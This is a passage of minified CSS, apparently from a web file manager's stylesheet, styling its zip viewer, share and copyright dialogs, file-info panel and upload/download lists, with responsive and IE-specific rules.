.168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box .menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ 